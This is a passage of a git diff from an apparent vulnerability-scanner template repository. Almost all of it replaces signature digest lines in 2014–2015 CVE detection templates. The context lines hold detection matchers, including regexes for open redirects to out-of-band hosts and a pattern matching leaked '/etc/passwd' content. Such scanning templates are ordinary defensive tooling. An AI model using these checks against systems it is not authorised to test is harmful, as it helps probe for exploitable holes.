b/http/cves/2014/CVE-2014-5368.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204f45468595e3aa0fe122a51bbee82d41c739a9b64e551144c366030af7d21d9b0221009e8099b0b459cf22fdbe6044348e115ed8bc33ed1a98bee993879f856087bc00:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202dca8924a2003fafb79a513c9c9f44136476af59ddc52eacca8f8d6b0ca0d38802203258112783370d60cbf306ecb6e7b7a8e1c1fdba3fd205010bec1b2d397435da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 78dceb3bf0..c5a0a123b6 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207402c86906d4c1e4b8197c7c2b8b5a68c35f64e4d62c9594919975c0f9c1ee5502204adc597244fba49f912b587e94e3bbf24b18e4fc620f2bb3521146a5cba16317:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204581df86e97c5730742f74720cb30156f9076ff4f73b1193acd2fb97fb919639022100da905b5e002f47736b35b36c17677da3df847b983c8011f713df1514ca3f0ad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index f6c69b9701..c0dc866842 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204462a2a0ce1f08e86bc3236fc2c7e0d8e771624de2ccf5a1337291424441776a02204b65e9c0d07972d8fbf589ce9e23c626f52cd30603a06a27a21d2edc1d7d9281:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220378b363775b0d9366a108a38b6e600aca75ce9582147d986ab883f60455a8911022100e8298f11e82c1fe24ebeb791760409ea3e6ab48be5c17cedb68d365ede10071a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 190ae0d9f8..99cc67814e 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f450f4c21c11ac2c7e375e331fa461031e788a4bdb96591eafb193d998341295022100889880111f1b7a46b42ab6af495c4493058419a7ca45b052bc9080a6bd2d39eb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c963760dd3ded857e804b7e2ead99f47605e6384f6c755ed2f0641b7667c559e0220011544fc77b6c78dbff85bf3af2c6d1a8d6b960bd9128fb42e96d9f977b8400f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index f4730956a9..2b44b8969f 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b2349e10d547d941bf7d3622fb40d3ab3ccee458ebabeac4ab330872c519c86a022100a4b9c45ed928052333663ff790bfbc79b9ac38c0452659843831b3b8efa7b556:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022078713605d70b55246b3933638f3772713457a5d9eaa82893fac3eee4ce72cbc80220443cf4e8ee2c995b0278e8f48f6cd9dae4ac63bfe983d0bb5c5a628307f34ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 05f74ed680..b50f441d69 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4b0a00483046022100cc6aee7b339d86786ef116c907a0ffa3d8756e06f5f4acf8e55c4a2dc20720f5022100c6ee6488a064cddd36533104b8c229bd7e68c15ffbf1938da9cc30f28b202949:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220096584ba8fb9aea0d5a093eeea33204b07706a68f7f6ff84696c0157e3d1378702210091b9bfdc61f0c86ac953aabae24490d23a5d338303d313623da620d97533b9e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 5abc02e007..e10845b6df 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205ed180205cbd21cc6012427e8e8dc85b0aa7c24c135adedb9b0935a726525b6c022100e4ababac8f0bf42e5bff0a016c5b3ad000760f4fdd77d6b2e1790ab8d5f4a719:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207a32e3d23c2365c0c603c1edf59eef93033460dd3a4afc1156b848e1e74641d9022100f29f8fce2250f6a4e3fd80f8774d43f3f9653a08a920d32aa397011de7f78303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index d82a522c93..0c7c78164a 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e9468dae724cdceeced22b56984be0205ad8ce4800b9d9d14a2fd7910347016c022100f126bb0ce4cd0bd8636b96f496f2b866d3ac8cc832b616c90303e4a9002872b2:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204c78bd66627d074c22c0f92fcf83426764d4ec6b916879a51f650ef9ef501a82022076dbdfe48e700963d6c3d13be46feea619fcdb3ae1c366c2d529acea5b046eeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index b5e17419c0..5b33a91d6f 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b806ecb51d54fcdc9534346b86f0f00a369e8c4f81edc9563ae5f9db426893bd022050393e8a2ab04d872f19099a77baeb60bedefb20307fbf208a805a4f5eb16a73:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203a9015be8ddf2a75532f9e7917eaf827e45bde115a6a338b7e3823a91321b8b30221008b4a131eeb63849aa8c9d44dda4b2ee52abd9401b31807a1d89947c0adfba473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 35a87fa0d3..4bb54261f9 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220108482ed3183644895e2df932dd2d2d56fddaddd16cac55abf36168564c37171022008c761eeaf9c78b8bb679ff3cd924097e40b917f967eb58d94df0b49feaa413f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206c4d44c7b966ddf85528c3d7af863abefc537102cf325c284fd0d2cbe8c0c9fb022100eccad9a00d09f52658f54e2d1b1a0d55a502fd6a3735ad139585e475659f3cd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index 7e801b3360..e83d65c76a 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bd6d37ae8a251d5d23d3270163c014f8bf77addbee258cc794e3a47c737344a3022100b5335775a5d8f2f43295535343fbec70e818de044625b69e4c213836d4ac3548:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008c09bfca00e37f46598fbbaada6079d421022072c458dc1bd68e8231b88292b8022003e182fd746047ba5e4a8d6f64a11737ce268fc23bcaa3c925a1d344360d433a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index ffc0ad4ff3..cb56c6bd6f 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 302 - -# digest: 4a0a00473045022100bcbeb9e81247b97d5420d06fc072661e517933c29a09161fab2d908640779519022045ea181bdb413778636f5d104735524eca9db016a9dfe846c88de4a8de4e4eb1:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044021f1cfa7d0d874023a9f559555e3a351f3cdcdc80edd4c85075f857a112f84a59022100cacc988647636edce206cf2d3f51ba96dac3a4d297ef82bea66f0d4c56b34bf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 781d9ad8f9..74994cd353 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d69d2317398a8f744032f9535c9a07e5913a13d5d98b1601e124950212fae8ea02201d46c2387c75acffe6a98bf28da132297144ba6a395099f23efab2cc5811731a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204e450b9ae38dd0f32041c0917efc0f3bab2b3305b2d89fc0421cfab3c665af240220551da627d7611db0ccc8b876d1dc4a51a2f57a11f587620bf862e2c3a58b2e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index b2fe38e62c..002fb9c076 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a00463044022048603cf82ca090463278465b004ecf7e9e6864a680eaf80b16f50ca238910d80022016d4ac5ce7491cbf5d6c6a9faf4eabc88012244cafd39625d2ab7d31aef798c2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e6a76ffacd6a757f4f60317d06c3d0d3cbcb3c12691ee24b7662ac30ffde19d2022100f88e2398672245c900299d1d14e1d490759cfd22145d8161780af8dd81d0195d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 8ecc43be5d..070280abf4 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201e77822f213457c104ae84cd876e6d08f4b7685191185b6fe64c33fafd6dce8402201ba1f4ce423fa4b9849ca21544075f8234368a2b1d8c8836edbaf87de046d7e0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a5caabccc833f7b2712834282733aae340242c8e1a57319e3778996b6a741d63022100b295d085f539eb6a0249821acbcf526fa9c78fc4dd337311c7f33c12bc828d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 6180cb7242..7d8b564b58 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022020e696e0c27a2df973906272904f967e82777addce44792f81867c6b9c697177022100d7b6eba2bfb402f85fc8cc74044ca71f639700929ae3cbde73d3330091a55510:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220075e3f3e6b6532c9085e5febde6afd8815b59fa0a1f7850666f2b2f59a623a250221009e10da417aa1578efe3323f870d426fde66db3b8151aa9af3e42bef61ff42e95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 240c7c293e..1a58b92852 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203eefece7070f9c83dccb0680869940bdf7d47245f351ee172a011389cd01813602203afef6f81067f8a6d8a83d2b21e17befbd19a167b96e0aec8f05be53fcc2fa05:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210098a8a3065784808b2c3476e8868bf28aecb09fa6b4c6fdf626964581bb374a35022100d50fece2e71135082b830990bab255e6a7919c4fe61eee5455f3bc6be1a48828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index b57af41b22..eea6c9658b 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207afeb57905e436baad3eaec1db23383def03fad4a783ed4a31b10724f4a3563302203df28a9c027d300b3fab24e27a4aed5c2ec58f0a5a67b4140955595bd3605ed5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022078b244bb7cc66a73fcab56a7d8e322ab68616c7f6c917c2f4d0461326daaeb7e022100fb5f7d895b5e1f812f243f4f4023576d18753bc02642a6577122c13a5573c38c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index ea8f5c1701..c22b9c2e22 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022005bd8738db3b1e1523d83f05cf5654ef4ef2d460148f3f3292488c2c627be1e2022100f57d3760d3fb04b2da6fc66fa5fef1ffebbd3fa8afa62fb2145720f36e8fa1cb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203af507b8ee991c92906616085b1224077278eec5438d48c62759bfba41f21ae5022100ba66f45440a4474b6a4570a03cbf86af0709d8fc1d67da1873b21612e3df4da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 9caff436d9..9a4f231050 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -62,5 +62,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cbb478349335b35a311a5b9eb248a5d1f5d6996c8715194d965867b857c246df0221009e8c434a37150e80889e5ad4eeefc9fa38fab72a9f3e608fd0b6b406e4028a0a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210084ec5f9f1f9e7e73b3a2437701ff99e31274a9472fe9ad2f49c82a32c722f41802205925866d09356bc14bfe68a25b31a93e47e34b3f92a58b796f35a5dfacf3646d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 4cd3cee0d9..19931bc5e9 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009b45ea7e8dce8772c766c8493d28b4fa383dde0236430657524d1c4fe167fa22022100c477b8547acb1e5f5d4a45f68515cedaf66c2ea80daf5d83e08fbb0db4f99bb4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f2e10541481191940a8661ddd54f158a339d09fc34aefb5baa12bfcf5b3e69de022100825df3d808604d5069b2a50418d10cc0fc976d1e870ec32516d9e9882e8ab9c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 498512abc6..4c15dad833 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204ec1b153b3325821af9357407d2f9177c42132eb23a446b3866c021a27c1874a022100ed47d53be11b48c921e8d315310b43160d53b49ce272afe9ec511c40d329d1b1:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022063ce6a3bd66783c02742299123ed05fc18ba20c4bf843b8036031ba3dae7629a022067f2e38f719b65b0631c5e859aff91bcd5554748c5fe75bc88f538e864a7886a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index 9627f6d20b..20f512634d 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 400 - -# digest: 4a0a004730450220129aaeda40bc632a74714e12fd42b4c9f6f6f3d7ea012a82d080cb539526b56702210093f98414a35cf4eb85efaf9a586384d6a2f93b1990cff6498d1d6fbafab10dc9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220742ec34efa63e2abc0817f28bdd67bc0be01e757bcf37ddcd439d5f22377681002210096db85a2edbc79ac08723eb6fa3178c7eb5e68eec28a7d023f27379b6e169fbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index dcd6b94d12..9e57c6cddb 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022038178edc94923cd01c2bf00e6b56e9ba4623f0c5dcf0f9a160c3e0c5820dab4902204bf00e9060eb8705600d1839a9fa7b430ee191191b5c6131bfb7c7c99a6e1141:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e8e5e31fe68d6208a17daa038d0faada20f8fb15873e1e70d25f82e26f2a691c022100814bbeb6cc4bf5afb873a21c2c649135d6a8224053d395d033a4048971b73bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index b4271d1345..8c7fe7d353 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -42,5 +42,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and - -# digest: 4a0a0047304502203b592fc7a18d9caf4f00ea3dd292515adbcf4b30402ee3f58238203dc2474c26022100ca99c33f847b0c201ac5ba4e693ec501679717b180439ee924aa0930dea6f118:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100badf15abfa270f9b039b4e4941e42c577b05362bd9bbe0a4c52036e55e6d5d8e02200e060fb018ddbfb73fa99b556b6a26c2c14a7719aaf53ad569ec851e29ec3700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 3269f7d747..27a5ea77f6 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -55,5 +55,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and - -# digest: 4a0a004730450220752e8f5eee3b93ae48474c08f3be47ef7ff6e71b23fb5f3f9d33559b0afc0cf6022100c13c5a242bfbecd9f0778b9bb7e8bdfe4623620163858fb55bbde900281ad889:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207c4d30dc5eb57fe0ff8c5f631787fdf6a00541d5536cab7b9cfedd3c01ef3235022100817e113ff74be3185c8bb7a18ad256e492ee5cb58b82faffd047874ddd70b468:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index a784c622d5..25119e8026 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c205f412faf2aa91d56b9cfd3dc3a36170277ace96a743cc3a04bed53e1f92e2022100ee1298edd6dfb5e0fb0ffbd580cc4105d85f0ba85171d4aeb983a4da9b2ca5d9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ec636bdc8528984a0202673ec12dcff4a12f06f925039f5d0a841d3f45388dbf022100821e13e9bae318d4ac67cb62877ca6945e3c42cfdd45ba8c9183d236b7b926eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 82b449af99..eefce3820b 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# digest: 4a0a00473045022100e3a319b3416d4412d528920dc9c41ecb87234b899d1bd8a649bd6065394980bc0220324fbcf625794535be6105e9cbc4821b09ac473a12f50c290c28a04045b211e6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201fe01feec5201a4a06f34999caa09cb704169c7d38dd535e5fabb1cfb8143cb5022021421be05cd86230062bf410e6aa397be4a0a394450e64bf8239f4b1167c9f1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 2aac055b02..c4a8975cca 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100869f678e18457b74e8692748dd03a698a4de5f94abad61c68a33239a78eb915402207ba3e24b23332841e0f454b38c9403aef9cd4d6848c5a6e58b3da448127f343f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fd0b840453ed2758ef5cc9db8fe29b99ac7cad18390fa43e9c555eaa581b688402210083d9e007ef5ea7b6f701588de98fd624b3219186c639f8e85929c5cee0ddb4fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index d9e43870da..5b16605bd2 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -52,5 +52,4 @@ http: - data-session-id= case-insensitive: true condition: or - -# digest: 4a0a00473045022100ff5eb7aa7df7e00024dc9453b3cceb09f210f129438eda05158fa3c8dae3cc4f022037cb323f02b4b2389fb02aed03217860054998665d89f41224d0a3bf3220d864:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200b208bae946c7df25f0115b1288062a978558a1d9eb3f84a19b98c519817a29a022100e017fac32754ee2d23dd88f39e76e5538a7240d3208853fc1d8440e3401ef55d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 9a430016cd..d7914f0521 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cbbd60e47aa79b34dd945b0654c07c0add24b8eb123a90dd064a39b0a3eefa4202200f838aa1ee6f3ec851f7bffd9a8f18c99d69c7fbdc4fc6af87b88715b9432467:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220315e4175f91a0e722328b34b98b2ee2ff92ebda96f2c68137ce6815d2af9b23702202ad4f294f9b06f808b9ff951de1dccfe7fd1d1cddb4f4484716c1a4dcabc23f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index 98fb8a8782..b53b7e54d9 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022001f9ca187fcc1f734369800d1ec1b2f25a99a0e266be300e18a44b52389137910220466c8ceb1e4aaa6c4f78b96a1fc3e594bcb666afb81f3a0f89109a4f17e17c96:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100abfadaef4c31fbc568caf4c12b84d845013cff5386be1b20a7bb3b70daf97e6f022100ca81c1aeb2ba76aa5ceffa7c23d8dfceaf9a6712caaccbcee31336bf8d3d218a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 519309d47c..edfc52696a 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -47,5 +47,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" - -# digest: 4a0a004730450221009ca0e73f5786de413ee84cbb3b517935099118fffc8215153ab9a3ea0b95aece022002d8f8d0689b0b9bfa39db87876d77f5038586dde74f88c4a6f735e1c83e7a40:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203e2bbc473b0e0258facad167f83ccd9f7993ae4e6503243fa5c3e44da4fdec4b02203c57a3a5ebc0d1b415355fc69ca398fc510d623336fc27da86ce05cbf76fb564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index c727d02e8f..5e236510ec 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202ca97d0e5abba0f94d2ea721fd1d6cacf82e84c5905ab2da742a4c4568219dff022100cc9330626b06eac848544d6401304fd21119edbe4e41e933f1b2b7bc1e445832:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022017cc11aba7372c7bba0466fa54a7a47bdb27265d6b4f0f2d023e8e9688e61d67022100e5c0865afbf380ad18e4ae7cabf270687104396d8fbc9508e0538ae492217185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index da216809d7..6b14c11f7a 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -50,5 +50,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and - -# digest: 4b0a00483046022100c47df8c2349785382b12af067acb86e65f6b49dbe595846904d8e5d0c2ad1dc9022100d83b88d28f639e0885cfb88071f0d5c3307001c464bce8f6a80809a421f76d18:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b1c489077c8ea1539775e2ea9001aae1bd34ee583ab436a434640b0775feef2202202c00e595c0084081b976afcfb9f1e4b1ad772f3a9b1c1ac12948f8c838736eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 08ce3f632c..6a48bb879f 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -48,5 +48,4 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and - -# digest: 4b0a00483046022100dcad6b3a6076912e27d1845bf5f182cb353ec0a5edbd9864d7fbacfe5466bb8a022100846ec5d171737319f6e9329fa95392fd1e7ce5791a1002727780d941e9a47b1b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220091955120754e46f0c6c8a4412db4855ecdafecb95e67bda8552f9281299740f022100a5d10c0ff1e4ddf3cf88bb7c23caee49a82f71dd334e9c8f3bda546593b0c4cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index da765b2f94..0d313c9215 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100949b2e9b2b19f44c69020a8fd8421da8571b57aa0e37c6cbf079f424c19f70a1022100e09cd9a7a9e12827580b825541327a467d99256198a10566d44642ed3ce9f4e3:922c64590222798bb761d5b6d8e72950 +# digest: 